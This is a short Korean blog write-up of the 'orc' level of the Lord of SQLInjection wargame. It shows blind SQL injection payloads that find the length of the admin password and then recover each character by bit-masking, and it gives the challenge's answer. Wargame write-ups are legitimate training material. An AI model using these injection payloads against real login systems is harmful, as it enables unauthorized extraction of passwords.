-
LOS - orc / level 4Web/SQLI 2024. 6. 21. 15:32
풀이 과정
Blind SQL Injection으로 수행
length로 길이 체크 후 비트 마스킹
pw=' or id='admin' and length(pw) > 1 %23
pw=' or id='admin' and length(pw) > 8 %23
=> admin 의 pw의 최대 길이는 8
pw=' or id='admin' and ascii(substr(pw,1,1)) & 1 %23
~
pw=' or id='admin' and ascii(substr(pw,1,1)) & 128 %23
각 자리 수 도출
정답
더보기?pw=095a9852
'Web > SQLI' 카테고리의 다른 글
LOS - darkelf / level 6 (0) 2024.06.23 LOS - wolfman / level 5 (0) 2024.06.23 LOS - goblin / level 3 (0) 2024.06.21 LOS - cobolt / level 2 (0) 2024.06.21 LOS - gremlin / level 1 (0) 2024.06.21